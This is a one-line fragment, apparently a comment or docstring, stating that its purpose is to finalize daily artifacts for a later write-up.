    Purpose: finalize daily artifacts for later write-up.